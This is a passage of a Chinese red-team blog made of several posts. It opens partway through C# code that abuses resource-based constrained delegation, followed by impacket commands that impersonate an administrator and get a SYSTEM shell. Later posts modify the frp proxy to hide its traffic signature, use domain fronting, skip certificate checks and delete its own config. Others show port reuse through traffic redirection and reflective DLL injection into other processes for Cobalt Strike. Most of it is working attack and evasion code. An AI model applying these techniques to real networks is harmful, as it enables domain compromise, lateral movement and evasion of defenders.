            System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry("test.local");
            myldapConnection.Path = victimcomputer_ldap_path;
            myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
            System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
            //通过ldap找计算机
            search.Filter = "(CN=" + victimcomputer + ")";
            string[] requiredProperties = new string[] { "samaccountname" };
            foreach (String property in requiredProperties)
                search.PropertiesToLoad.Add(property);
            System.DirectoryServices.SearchResult result = null;
            try
            {
                result = search.FindOne();
            }
            catch (System.Exception ex)
            {
                Console.WriteLine(ex.Message + "Exiting...");
                return;
            }
            if (result != null)
            {
                System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
                String sec_descriptor = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
                System.Security.AccessControl.RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
                byte[] descriptor_buffer = new byte[sd.BinaryLength];
                sd.GetBinaryForm(descriptor_buffer, 0);
                // 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
                entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Value = descriptor_buffer;
                try
                {
                    entryToUpdate.CommitChanges();//提交更改
                    Console.WriteLine("[+] Exploit successfully!");
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine(ex.Message);
                    Console.WriteLine("[!] \nFailed...");
                    return;
                }
            }
        }
    }
}

impacket 套件中的 getST.py 申请票据，导入票据执行命令

1
2
3

python3 getST.py -dc-ip 192.168.247.8 test.local/testpc1\$:123456 -spn cifs/WIN10.test.local -impersonate administrator
export KRB5CCNAME=administrator.ccache
python3 smbexec.py -no-pass -k WIN10.test.local

system权限上线就可以愉快的执行mimikatz了。

0x03 其他攻击场景

一个公司可能会有一个专门用来加域的账号，虽然这个账户通常只有普通域用户权限，但是如果我们控制了这个账户那么就可以打下一大批机器。
如果我们想拿域内机器A的权限，如果我们又没有机器A administrators 组成员凭据的话还可以看机器A是通过哪个用户加入域的，控制了这个用户依然可以获取权限。
一个域用户X 可能会在域中创建多台机器(比如笔记本和台式机都需要加入域)，当我们有了域用户X的权限时，可以利用rbcd继续攻击其他mS-DS-CreatorSID是域用户X的机器。

0x04 参考链接

https://mp.weixin.qq.com/s/Ue2ULu8vxYHrYEalEzbBSw

https://mp.weixin.qq.com/s/rXqSfjTFUQJsirkhi1hmHQ

https://daiker.gitbook.io/

https://www.cnblogs.com/car7n/p/14789004.html

https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

https://xz.aliyun.com/t/8690#toc-73

FRP改造计划续

2020-12-29T16:17:17.000Z

前言

之前@Wfox师傅在群里提到“通过websocket协议让FRP用上域前置，可以隐藏真实服务ip地址”。最近没有项目，重新进行一下frp改造计划。

可行性证明

先用dns域名解析来证明域前置方案在frp上是可行的，这里也可以直接修改本地hosts文件来实现dns域名解析的效果。

比如我们用如下frpc.ini

[common]
server_addr = dwnwdqndlnqwln2321321.com
server_port = 23333
token = uknowsec
protocol = websocket
tls_enable = true

[http_proxy]
type = tcp
remote_port = 10002
plugin = socks5

让frpc认证数据包走websocket协议。

可以看到认证是通过websocket协议，这里特别标注出来了Host头，要实现域前置，我们只要把host修改为我们的指定回源域名即可。所以证明了“通过websocket协议让FRP用上域前置”是可行的。

Websocket依赖修改

跟进frp源码，我们可以到websocket依赖包websocket/hybi.go文件下的hybiClientHandshake函数。

func hybiClientHandshake(config *Config, br *bufio.Reader, bw *bufio.Writer) (err error) {
bw.WriteString("GET " + config.Location.RequestURI() + " HTTP/1.1\r\n")

// According to RFC 6874, an HTTP client, proxy, or other
// intermediary must remove any IPv6 zone identifier attached
// to an outgoing URI.
bw.WriteString("Host: " + removeZone(config.Location.Host) + "\r\n")
bw.WriteString("Upgrade: websocket\r\n")
bw.WriteString("Connection: Upgrade\r\n")
nonce := generateNonce()
if config.handshakeData != nil {
nonce = []byte(config.handshakeData["key"])
}
bw.WriteString("Sec-WebSocket-Key: " + string(nonce) + "\r\n")
bw.WriteString("Origin: " + strings.ToLower(config.Origin.String()) + "\r\n")

...
return nil
}

可以看到Host是通过config.Location.Host进行赋值的，我们再一步一步的往回看调用即可。

同时frp调用websocket依赖在pkg/util/net/websocket.go里的ConnectWebsocketServer方法

func ConnectWebsocketServer(addr string) (net.Conn, error) {
addr = "ws://" + addr + FrpWebsocketPath
uri, err := url.Parse(addr)
if err != nil {
return nil, err
}

origin := "http://" + uri.Host
cfg, err := websocket.NewConfig(addr, origin)
if err != nil {
return nil, err
}
cfg.Dialer = &net.Dialer{
Timeout: 10 * time.Second,
}

conn, err := websocket.DialConfig(cfg)
if err != nil {
return nil, err
}
return conn, nil
}

所以只需要在往websocket.NewConfig多传入一个指定的host参数即可。

新加入的host参数只要在cmd/frpc/sub/root.go的RegisterCommonFlags里进行注册即可。

测试效果

这样我们就实现了通过websocket协议让FRP用上域前置。

WSS实现

由上图，可见用websocket还是特征比较明显的，比如/~!frp。这里我们可以通过如下修改

pkg/util/net/websocket.go下的变量即可。

1
2
3

const (
FrpWebsocketPath = "/~!frp"
)

同时，我们也修改frp使之实现wss协议。

@Wfox师傅提醒frp有人pull了支持wss协议的修改代码。

https://github.com/fatedier/frp/pull/1919/files

通过pull里的修改就可以实现wss协议了

同时由于在某云域前置里，用wss协议的情况下，server_addr用域名会不能正常回源，只能用ip。且会存在证书报错。

这里可以通过做如下修改pkg/util/net/websocket.go里的ConnectWebsocketServer函数

// addr: domain:port
func ConnectWebsocketServer(addr string, websocket_domain string, isSecure bool) (net.Conn, error) {
if isSecure {
ho := strings.Split(addr, ":")
ip, err := net.ResolveIPAddr("ip", ho[0])
ip_addr := ip.String() + ":" + ho[1]
if err != nil {
return nil, err
}
addr = "wss://" + ip_addr + FrpWebsocketPath
} else {
addr = "ws://" + addr + FrpWebsocketPath
}
uri, err := url.Parse(addr)
if err != nil {
return nil, err
}

var origin string
if isSecure {
ho := strings.Split(uri.Host, ":")
ip, err := net.ResolveIPAddr("ip", ho[0])
ip_addr := ip.String() + ":" + ho[1]
if err != nil {
return nil, err
}
origin = "https://" + ip_addr
} else {
origin = "http://" + uri.Host
}

cfg, err := websocket.NewConfig(addr, origin, websocket_domain)
if err != nil {
return nil, err
}
cfg.Dialer = &net.Dialer{
Timeout: 10 * time.Second,
}

conn, err := websocket.DialConfig(cfg)
if err != nil {
return nil, err
}
return conn, nil
}

用net.ResolveIPAddr先获取域名所对应ip地址，再进行wss和https协议的使用即可。

另外修复证书错误问题。

修改websocket/dial.go里的dialWithDialer方法。

func dialWithDialer(dialer *net.Dialer, config *Config) (conn net.Conn, err error) {
switch config.Location.Scheme {
case "ws":
conn, err = dialer.Dial("tcp", parseAuthority(config.Location))

case "wss":
config.TlsConfig = &tls.Config{
InsecureSkipVerify: true,
}
conn, err = tls.DialWithDialer(dialer, "tcp", parseAuthority(config.Location), config.TlsConfig)

default:
err = ErrBadScheme
}
return
}

当使用wss协议的时候，将TlsConfig.InsecureSkipVerify设置为true，即可忽略证书错误了。

测试效果

可见图中的认证数据包已经以wss进行认证了。

配置文件自删除

在其中看@lz520520师傅的文章里看到

https://sec.lz520520.cn:4430/2020/11/566/#0x03

只要读取后删除配置文件就好了呀，这个就很简单，我多添加了一个配置文件参数delete，用于判断是否自动删除配置文件。

这一点还是不错的，添加参数，读取完配置文件启动frpc后，自动删除配置文件。

同样相同的方法在cmd/frpc/sub/root.go的RegisterCommonFlags里进行注册参数即可。

然后在cmd/frpc/sub/root.go里的startService方法里进行判断调用删除配置文件即可。

func startService(
cfg config.ClientCommonConf,
pxyCfgs map[string]config.ProxyConf,
visitorCfgs map[string]config.VisitorConf,
cfgFile string,
) (err error) {

log.InitLog(cfg.LogWay, cfg.LogFile, cfg.LogLevel,
cfg.LogMaxDays, cfg.DisableLogColor)

if cfg.DNSServer != "" {
s := cfg.DNSServer
if !strings.Contains(s, ":") {
s += ":53"
}
// Change default dns server for frpc
net.DefaultResolver = &net.Resolver{
PreferGo: true,
Dial: func(ctx context.Context, network, address string) (net.Conn, error) {
return net.Dial("udp", s)
},
}
}
svr, errRet := client.NewService(cfg, pxyCfgs, visitorCfgs, cfgFile)
if errRet != nil {
err = errRet
return
}
if cfg.DELEnable == true {
os.Remove(cfgFile)
}
// Capture the exit signal if we use kcp.
if cfg.Protocol == "kcp" {
go handleSignal(svr)
}

err = svr.Run()
if cfg.Protocol == "kcp" {
<-kcpDoneCh
}
return
}

这样就可以实现配置文件自动删除功能了。

Github

没有环境或无法正常编译可直接到github下载

https://github.com/uknowsec/frpModify

Reference

https://github.com/fatedier/frp/pull/1919/files

https://sec.lz520520.cn:4430/2020/11/566/

OXID_Find：通过OXID解析器获取Windows远程主机上网卡地址

2020-07-19T11:17:17.000Z

数据解析过程

规律：

每一个String Binding都以\x07\x00开头。
每一个StringBinding都以\x00\x00分割，一直到第一个Security Binding是\x09\x00开头。

因此，当recv的数据直到\x09\x00结束，开头就比较好办了，第四个数据包起始位置往后偏移42个字节就可以到达第一个String Binding。

C++

OXID_Find by C++（多线程）通过OXID解析器获取Windows远程主机上网卡地址

https://github.com/uknowsec/OXID_Find

> OXID_Find.exe

Author: Uknow
Github: https://github.com/uknowsec/OXID_Find
usage: OXID_Find.exe -i 192.168.0.1
usage: OXID_Find.exe -c 192.168.0.1/24

Csharp

OXID_Find by Csharp（多线程）通过OXID解析器获取Windows远程主机上网卡地址 From @RcoIl

学习@RcoIl师傅的代码SharpOXID-Find,加了个多线程，支持cidr格式传入ip地址。

强推一波@RcoIl师傅charp代码库CSharp-Tools。

https://github.com/uknowsec/SharpOXID-Find

> SharpOXID-Find.exe

usage: SharpOXID_Find.exe -i 192.168.0.1
usage: SharpOXID_Find.exe -c 192.168.0.1/24

Python

https://github.com/Rvn0xsy/OXID-Find/

> python2 finsubnet.py

usage: finsubnet.py [-h] -i IP [-t THREADS] [-o OUTPUT]
finsubnet.py: error: argument -i/--ip is required

References

https://payloads.online/archivers/2020-07-16/1

frsocks+protoplex+流量重定向实现端口复用

2020-07-16T11:17:17.000Z

前言

前段日子A-team群里的师傅sunshine，讲到了一个端口复用的方案，并发了几个工具，这里简单记录实践一下。

frsocks+protoplex+流量重定向实现端口复用

frsocks

https://github.com/3gstudent/Homework-of-Go/blob/master/frsocks.go

监听本地的2333端口开启一个socks5代理，这里也可以用其他工具，如ew，frp等等。

1	./frsocks -sockstype fsocks -listen 2333

protoplex

https://github.com/Pandentia/protoplex

这是一个协议复用的工具，比如命令可将本地9999端口的流量根据协议类型转到本地的2333和80端口。

注: 在实战环境中，先用protoplex进行分流，然后再进行重定向。

1	./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999

注: protoplex设置分流的http协议IP和重定向的ip不要设置为同一个ip,否则会形成闭环。

同时该工具还支持其他协议的分流，如：

SSH
HTTP
TLS (/ HTTPS)
OpenVPN
SOCKS4 / SOCKS5

流量重定向

linux

将访问80的流量重定向到9999端口

1	sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999

windows

将本地80流量重定向到9999

1 2	netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129

效果

结语

站在巨人的肩膀上。

本文思路和工具都来自sunshine，仅仅记录分享一下。

利用ReflectiveDLL来武装你的Cobalt Strike

2020-07-06T19:17:17.000Z

前言

Cobalt Strike已经成了目前工作中经常用渗透工具了，通常我们会通过写一下插件来武装自己的Cobalt Strike，比如我们会用bexecute_assembly来对自己编写的Csharp进行内存加载实现不落地。那么其他语言的呢？同样也提供了bdllspawn来反射DLL。本文章主要讲的就是利用反射DLL来武装自己的Cobalt Strike。

C++ ReflectiveDLL

首先将C/C++编写的程序如何进行ReflectiveDLL，Cobalt Strike的bdllspawn是基于项目ReflectiveDLLInjection实现的。我们只需要把C++编写的功能写到ReflectiveDll.c里即可，这里参考倾旋师傅的文章和工具。改写ReflectiveDll.c来实现传参。

参数转换

引用与定义

#include "ReflectiveLoader.h"
#include 
#include 
#pragma comment(lib, "Shell32.lib")

std::string szargs;
std::wstring wszargs;
std::wstring wsHostFile;
int argc = 0;
LPWSTR* argv = NULL;

参数类型转换

在ReflectiveDll.c里是通过DLLMain函数的lpReserved来当做参数传递，我们可以做一个类型的转换，将lpReserved转换成命令行参数格式。

1
2
3

szargs = (PCHAR)lpReserved;
wszargs = StringToWString(szargs);
argv = CommandLineToArgvW(wszargs.data(), &argc);

功能编写

在转换参数后，我们就可以把一些C++功能代码写入，我这就简单编写一个参数输出功能，进行测试。

hAppInstance = hinstDLL;
printf("C++ ReflectiveDLL\n");

/* print some output to the operator */
if (lpReserved != NULL) {
szargs = (PCHAR)lpReserved;
wszargs = StringToWString(szargs);
argv = CommandLineToArgvW(wszargs.data(), &argc);
}
if (argv == NULL) {
printf("[+] Error Arguments ! \n");
break;
}
printf("[+] Args Count : %d \n", argc);
for (size_t i = 0; i < argc; i++)
{
wprintf(TEXT("[%d] %s \n"), i, argv[i]);
}

/* flush STDOUT */
fflush(stdout);

/* we're done, so let's exit */
ExitProcess(0);
break;

Aggressor Script

编译ReflectiveDll.c得到一个dll文件，然后编写一个Aggressor Script脚本来加载它。

Aggressor Script脚本提供了一些关于反射DLL的接口：https://cobaltstrike.com/aggressor-script/functions.html#bdllspawn

alias hello {
$args = substr($0, 6);
bdllspawn($1, script_resource("reflective_dll.dll"),$args, "test dll", 5000, false);
}

测试效果

这样我们就实现了将c++编写的dll通过ReflectiveDll来实现不落地传参执行了。

Golang ReflectiveDLL

Golang也成了现在一些安全工作者用得比较多的一种语言了，使用Golang开发的安全工具也越来越多，所以我们也可以通过ReflectiveDLL来对Golang程序进行利用。

这里参考WBGlIl师傅的项目go-ReflectiveDLL和国外大佬的文章Weaponizing your favorite Go program for Cobalt Strike。

特别感谢一下WBGlIl师傅，在我遇到问题的时候给予我的帮助~

main.go

参考WBGlIl师傅的项目，将main.go改成一个传入参数并输出参数的功能，并将test函数设置为导出函数。

package main

import "C"

import (
"fmt"
"os"
gsq "github.com/kballard/go-shellquote"
)



//export test
func test(arg string) {

args, err := gsq.Split(arg)
if err == nil {
fmt.Println("Golang ReflectiveDLL")
os.Args = args
fmt.Printf("Args Count %d\n",len(os.Args))
for i := 0; i < len(os.Args); i++ {
fmt.Printf("[%d] %s\n",i,os.Args[i])
}
}
}

func main()  {

}

dllmain.c

参考老外文章将lpReserved转换为 GoString，传入到dll的导出函数test里。

#include "dllmain.h"
#include


BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,  // handle to DLL module
    DWORD fdwReason,     // reason for calling function
    LPVOID lpReserved)   // reserved
{
    switch (fdwReason) {
case DLL_PROCESS_ATTACH:
        {
            GoString goArgs = {0};
            if(lpReserved != NULL){
                goArgs.p = (char*)lpReserved;
                goArgs.n = strlen(lpReserved);
            }else{
                goArgs.p = "";
                goArgs.n = 0;
            }
            test(goArgs);
        }
        break;
    case DLL_PROCESS_DETACH:
        // Perform any necessary cleanup.
        break;
    case DLL_THREAD_DETACH:
        // Do thread-specific cleanup.
        break;
    case DLL_THREAD_ATTACH:
// Do thread-specific initialization.
        break;
    }
    return TRUE; // Successful.
}

然后运行WBGlIl师傅的项目里的x64.bat来进行编译得到dll文件，但是Golang有一个最大的缺点就是编译出来的文件特别大，这里一个简单的输入输出工具生成的dll就有差不多2M。而在Cobalt Strike限制了反射DLL的DLL大小必须在1M以内，所以这里我们不能用Cobalt Strike进行测试。

Inject.c修改

ReflectiveDLLInjection项目中的inject是不能给DLL进行传参的，所以我们这里需要修改代码来进行传参。

注入当前进程

如果对当前进程进行注入可以修改代码，将输入参数传入到LoadRemoteLibraryR函数的第四个参数即可。

1 2	LPVOID lpParameter = argv[3]; hModule = LoadRemoteLibraryR( hProcess, lpBuffer, dwLength, lpParameter);

注入到其他进程

如果注入到其他进程的话，需要将参数写入到目标进程得到一个参数指针，再讲这个指针传入LoadRemoteLibraryR函数。

lpRemoteMem = arg;
// 申请内存
argSize = strlen(arg);
lpRemoteMem = VirtualAllocEx(hProcess, NULL, argSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!lpRemoteMem)
{
BREAK_WITH_ERROR("\t\t[!] FAILED to allocate memory in process.\n");
CloseHandle(hProcess);
break;
}

printf("[+] Memory allocated at : 0x%d in process %d\n", lpRemoteMem, dwProcessId);
printf("[+] Attempting to write parameter in  process %d \n", dwProcessId);


//将参数写入目标进程
bWriteSuccess = WriteProcessMemory(hProcess, lpRemoteMem, arg, argSize, &numBytes);

if (!bWriteSuccess)
{
printf("[!] FAILED to write parameter. Wrote %d  bytes instead of %d bytes.\n ", numBytes ,argSize);

CloseHandle(hProcess);
break;
}
printf("[+] Wrote parameter in remote process %d memory.\n", dwProcessId);

//将参数指针传入
hModule = LoadRemoteLibraryR( hProcess, lpBuffer, dwLength, lpRemoteMem);
if( !hModule )
BREAK_WITH_ERROR( "Failed to inject the DLL" );

printf( "[+] Injected the '%s' DLL into process %d.\n", cpDllFile, dwProcessId);

因为这里是注入到了其他进程里，所以当前进程是没有输出的。如果需要输出的话，可以修改DLL文件和Inject.c，即当前进程和DLL注入的进程之间用命名管道进行通信。这里以C++写的DLL为例。

inject.c

//接收

srand(time(NULL));

char buf[256] = "";
DWORD rlen = 0;
HANDLE hPipe = CreateNamedPipe(
TEXT("\\\\.\\Pipe\\mypipe"),//管道名
PIPE_ACCESS_DUPLEX,//管道类型 
PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT,//管道参数
PIPE_UNLIMITED_INSTANCES,//管道能创建的最大实例数量
0,//输出缓冲区长度 0表示默认
0,//输入缓冲区长度 0表示默认
NMPWAIT_WAIT_FOREVER,//超时时间
NULL);//指定一个SECURITY_ATTRIBUTES结构,或者传递零值.
if (INVALID_HANDLE_VALUE == hPipe)
{
printf("[+] Create Pipe Error(%d)\n", GetLastError());
}
else
{
printf("[+] Create Pipe Success\n");
printf("[+] Waiting For Client Connection...\n");
if (ConnectNamedPipe(hPipe, NULL) == NULL)//阻塞等待客户端连接。
{
printf("[+] Connection failed!\n");
}
else
{
printf("[+] Connection Success!\n");
}
printf("[+] Data From Pipe :\n\n");
while (1)
{
if (ReadFile(hPipe, buf, 256, &rlen, NULL)) //接受客户端发送过来的内容
{
printf("\t%s", buf);
}
else
{
printf("\n[+] Read Data From Pipe End!\n");
break;
}
}
CloseHandle(hPipe);//关闭管道
}

ReflectiveDll.cpp

//利用命名管道传输
srand(time(NULL));
DWORD wlen = 0;

BOOL bRet = WaitNamedPipe(TEXT("\\\\.\\Pipe\\mypipe"), NMPWAIT_WAIT_FOREVER);

if (!bRet)
{
printf("connect the namedPipe failed!\n");
break;
}

HANDLE hPipe = CreateFile(//管道属于一种特殊的文件
TEXT("\\\\.\\Pipe\\mypipe"),//创建的文件名
GENERIC_READ | GENERIC_WRITE,//文件模式
0,//是否共享
NULL,//指向一个SECURITY_ATTRIBUTES结构的指针
OPEN_EXISTING,//创建参数
FILE_ATTRIBUTE_NORMAL,//文件属性(隐藏,只读)NORMAL为默认属性
NULL);//模板创建文件的句柄


hAppInstance = hinstDLL;
char buf[256] = "";
sprintf(buf, "C++ ReflectiveDLL\n");
WriteFile(hPipe, buf, sizeof(buf), &wlen, 0);//向服务器发送内容

/* print some output to the operator */
if (lpReserved != NULL) {
szargs = (PCHAR)lpReserved;
wszargs = StringToWString(szargs);
argv = CommandLineToArgvW(wszargs.data(), &argc);
}
else {
sprintf(buf, "Hello from test.dll. There is no parameter\n");
WriteFile(hPipe, buf, sizeof(buf), &wlen, 0);//向服务器发送内容
}
if (argv == NULL) {
sprintf(buf, "[+] Error Arguments ! \n");
WriteFile(hPipe, buf, sizeof(buf), &wlen, 0);//向服务器发送内容
break;
}
sprintf(buf, "[+] Args Count : %d \n", argc);
WriteFile(hPipe, buf, sizeof(buf), &wlen, 0);//向服务器发送内容
for (size_t i = 0; i < argc; i++)
{
sprintf(buf, "[%d] %s \n", i, argv[i]);
WriteFile(hPipe, buf, sizeof(buf), &wlen, 0);//向服务器发送内容
}
CloseHandle(hPipe);//关闭管道

/* flush STDOUT */
fflush(stdout);

/* we're done, so let's exit */
ExitProcess(0);

这样就可以实现读取注入目标进程的输出了。

示例代码

https://github.com/uknowsec/ReflectiveDLLInjection-Notes

结语

在WBGlIl师傅的帮助下，学习了ReflectiveDLL。本意是想用于Cobalt Strike插件的开发，但是Golang编译后的文件过大，导致Cobalt Strike并不能进行加载反射。有请教过别的师傅如何解决这个问题，方案好像都必须得落地待反射的Golang DLL，效果并不是太好。同时在最近新发布的Cobalt Strike4.1中有了一个新功能Beacon Object File (BOF)，他可以解决文件过大的问题。

在官方文档help-beacon-object-files有如下的一段话：

BOFs are also very small. A UAC bypass privilege escalation Reflective DLL implementation may weigh in at 100KB+. The same exploit, built as a BOF, is <3KB. This can make a big difference when using bandwidth constrained channels, such as DNS.

所以现在就差一个Cobalt Strike4.1啦~

References

[1] bdllspawn: https://cobaltstrike.com/aggressor-script/functions.html#bdllspawn
[2] ReflectiveDLLInjection: https://github.com/stephenfewer/ReflectiveDLLInjection
[3] 倾旋: https://payloads.online/archivers/2020-03-02/1
[4] WBGlIl: https://wbglil.github.io/
[5] go-ReflectiveDLL: https://github.com/WBGlIl/go-ReflectiveDLL
[6] Weaponizing your favorite Go program for Cobalt Strike: https://ethicalchaos.dev/2020/01/26/weaponizing-your-favorite-go-program-for-cobalt-strike/
[7] help-beacon-object-files: https://www.cobaltstrike.com/help-beacon-object-files

FRP改造计划

2020-06-20T19:17:17.000Z

前言

frp无疑是众多代理工具中，用得最舒服的了。但是他还是存在几个缺点的。

.ini配置文件泄露服务器信息。
非TLS特征明显
golang编译打包后的体积过大

一直想改来着，但是一直拖着。前两天看到了吐司大佬发的frp讨论帖，于是下定决心改一下。

这里主要是对上面提到的前两个缺点进行改造，体积过大问题需要去整体的修改，减少他用到的一些依赖库和无用功能。

流量特征(非TLS)

在没有配置tls_enable = true

frpc在连接认证frps的时候回把frp的版本信息等等发给frps进行认证。

目前一些流量设备就通过这个特征来识别frp代理。

如上图，可以看到有如下几个字段值：version,hostname,arch,user,privilege_key,runid,metas

去除特征

去除的方法也很简单，只要把这些特征值修改一下就行了。

https://github.com/fatedier/frp

首先把frp的源码从github上下下来。

定位到认证信息的代码位置为：models/msg/msg.go

type Login struct {
Version      string            `json:"version"`
Hostname     string            `json:"hostname"`
Os           string            `json:"os"`
Arch         string            `json:"arch"`
User         string            `json:"user"`
PrivilegeKey string            `json:"privilege_key"`
Timestamp    int64             `json:"timestamp"`
RunId        string            `json:"run_id"`
Metas        map[string]string `json:"metas"`

// Some global configures.
PoolCount int `json:"pool_count"`
}

type LoginResp struct {
Version       string `json:"version"`
RunId         string `json:"run_id"`
ServerUdpPort int    `json:"server_udp_port"`
Error         string `json:"error"`
}

如上图，这里可以看到定义的结构里有认证时候用到的变量，和认证回显的变量。我们可以修改此处来去除特征。

如`json:"version"修改为json:"a"来逃避流量识别。

同时在这个go文件里还有其他的结构体。可以用同样的方法进行修改。

也可以修改字段的值，比如

1	Version string `json:"version"`

version这个变量的值。在Goland里跟进到这个变量被利用到的文件client/service.go。

loginMsg := &msg.Login{
Arch:      runtime.GOARCH,
Os:        runtime.GOOS,
PoolCount: svr.cfg.PoolCount,
User:      svr.cfg.User,
Version:   version.Full(),
Timestamp: time.Now().Unix(),
RunId:     svr.runId,
Metas:     svr.cfg.Metas,
}

再跟进version.Full()方法到utils\version\version.go

我们可以修改version变量的值即可，这个变量是frp的版本号。

var version string = "0.33.0"

func Full() string {
return version
}

另外变量值的修改可以通过同样的方法修改。

frp优化

最近在吐司看到有师傅发了frp的讨论帖子，其中说到几个点挺好的。这里简单的记录一下。

通过tls和算法加密frp流量

加密与压缩

# frpc.ini
[ssh]
type = tcp
local_port = 22
remote_port = 6000
use_encryption = true
use_compression = true

如果公司内网防火墙对外网访问进行了流量识别与屏蔽，例如禁止了 ssh 协议等，通过设置 use_encryption = true，将 frpc 与 frps 之间的通信内容加密传输，将会有效防止流量被拦截。

如果传输的报文长度较长，通过设置 use_compression = true 对传输内容进行压缩，可以有效减小 frpc 与 frps 之间的网络流量，加快流量转发速度，但是会额外消耗一些 cpu 资源。

TLS

从 v0.25.0 版本开始 frpc 和 frps 之间支持通过 TLS 协议加密传输。通过在 frpc.ini 的 common 中配置 tls_enable = true 来启用此功能，安全性更高。
为了端口复用，frp 建立 TLS 连接的第一个字节为 0x17。
通过将 frps.ini 的 [common] 中 tls_only 设置为 true，可以强制 frps 只接受 TLS 连接。

注意: 启用此功能后除 xtcp 外，不需要再设置 use_encryption。

frpc.ini写入源码

修改文件cmd\frpc\sub\root.go里的代码

把frpc.ini配置内容写到上面定义里。

[common]
server_addr=1.1.1.1
server_port=2333
privilege_token = pentest
tls_enable = true
[http_proxy]
type = tcp
remote_port = 23333
plugin = socks5

结果如下：

var (
cfgFile     string
showVersion bool
fileContent string = `[common]
    server_addr = 1.1.1.1
    server_port = 2333
    privilege_token = pentest
    tls_enable = true
    [http_proxy]
    type = tcp
    remote_port = 23333
    plugin = socks5
`
serverAddr      string
user            string
protocol        string
token           string
logLevel        string
logFile         string
logMaxDays      int
disableLogColor bool

proxyName         string
localIp           string
localPort         int
remotePort        int
useEncryption     bool
useCompression    bool
customDomains     string
subDomain         string
httpUser          string
httpPwd           string
locations         string
hostHeaderRewrite string
role              string
sk                string
multiplexer       string
serverName        string
bindAddr          string
bindPort          int

kcpDoneCh chan struct{}
)

修改代码：cmd/frpc/sub/status.go

var statusCmd = &cobra.Command{
Use:   "status",
Short: "Overview of all proxies status",
RunE: func(cmd *cobra.Command, args []string) error {
//iniContent, err := config.GetRenderedConfFromFile(cfgFile)
iniContent:= fileContent
/*if err != nil {
fmt.Println(err)
os.Exit(1)
}*/

clientCfg, err := parseClientCommonCfg(CfgFileTypeIni, iniContent)
if err != nil {
fmt.Println(err)
os.Exit(1)
}

err = status(clientCfg)
if err != nil {
fmt.Printf("frpc get status error: %v\n", err)
os.Exit(1)
}
return nil
},
}

修改代码：cmd/frpc/sub/reload.go

var reloadCmd = &cobra.Command{
Use:   "reload",
Short: "Hot-Reload frpc configuration",
RunE: func(cmd *cobra.Command, args []string) error {
//iniContent, err := config.GetRenderedConfFromFile(cfgFile)
iniContent:=  fileContent
   
/*if err != 0 {
fmt.Println(err)
os.Exit(1)
}*/

clientCfg, err := parseClientCommonCfg(CfgFileTypeIni, iniContent)
if err != nil {
fmt.Println(err)
os.Exit(1)
}

err = reload(clientCfg)
if err != nil {
fmt.Printf("frpc reload error: %v\n", err)
os.Exit(1)
}
fmt.Printf("reload success\n")
return nil
},
}

修改代码：cmd/frpc/sub/root.go

func runClient(cfgFilePath string) (err error) {
var content string
//content, err = config.GetRenderedConfFromFile(cfgFilePath)
content, err = fileContent, nil
if err != nil {
return
}

cfg, err := parseClientCommonCfg(CfgFileTypeIni, content)
if err != nil {
return
}

pxyCfgs, visitorCfgs, err := config.LoadAllConfFromIni(cfg.User, content, cfg.Start)
if err != nil {
return err
}

err = startService(cfg, pxyCfgs, visitorCfgs, cfgFilePath)
return
}

运行效果如下：

frpc.ini的ip通过参数传入

Golang语法规则：

golang的命名推荐使用驼峰命名法，必须以一个字母（Unicode字母）或下划线开头，后面可以跟任意数量的字母、数字或下划线。
golang中根据首字母的大小写来确定可以访问的权限。无论是方法名、常量、变量名还是结构体的名称，如果首字母大写，则可以被其他的包访问；如果首字母小写，则只能在本包中使用

不用上面的直接增加定义的方法，在cmd/frpc/sub/root.go写一个函数。

func getFileContent(ip string,port string) {
var content string = `[common]
    server_addr = ` + ip + `
    server_port = ` + port + `
tls_enable = true
    privilege_token = pentest999
    [http_proxy]
    type = tcp
    remote_port = 23333
    plugin = socks5
`
fileContent = content
}

然后在cmd\frpc\root.go中定义传参

func init() {
rootCmd.PersistentFlags().StringVarP(&cfgFile, "config", "c", "./frpc.ini", "config file of frpc")
rootCmd.PersistentFlags().BoolVarP(&showVersion, "version", "v", false, "version of frpc")
rootCmd.PersistentFlags().StringVarP(&ip, "server_addr", "t", "", "server_addr")
rootCmd.PersistentFlags().StringVarP(&port, "server_port", "p", "", "server_port")
kcpDoneCh = make(chan struct{})
}

修改runClient函数

func runClient(cfgFilePath string,ip string,port string) (err error) {
var content string
getFileContent(ip,port)
//scontent, err = config.GetRenderedConfFromFile(cfgFilePath)
content, err = fileContent, nil
if err != nil {
return
}

cfg, err := parseClientCommonCfg(CfgFileTypeIni, content)
if err != nil {
return
}

pxyCfgs, visitorCfgs, err := config.LoadAllConfFromIni(cfg.User, content, cfg.Start)
if err != nil {
return err
}

err = startService(cfg, pxyCfgs, visitorCfgs, cfgFilePath)
return
}

在如下代码中调用runClient()

var rootCmd = &cobra.Command{
Use:   "frpc",
Short: "frpc is the client of frp (https://github.com/fatedier/frp)",
RunE: func(cmd *cobra.Command, args []string) error {
if showVersion {
fmt.Println(version.Full())
return nil
}
// Do not show command usage here.
err := runClient(cfgFile,ip,port)
if err != nil {
fmt.Println(err)
os.Exit(1)
}
return nil
},
}

修改完上面的代码，就可以用

1	frpc.exe -t 1.1.1.1 -p 2333

来启动frpc.exe了。

这种在Windows下不会暴露远程ip，但是在linux下还是会暴露的。

所以可以直接加一些加密啥的，-t参数传入ip加密后的地址，然后在源码里加一个解密的步骤即可。

同样也可以将ip地址以十进制或十六进制传入，然后在程序里转换会1.1.1.1格式。

运行效果如下：

编译打包

frp整个项目编译打包其实也挺简单的，首先保证go和gcc环境都安装好。

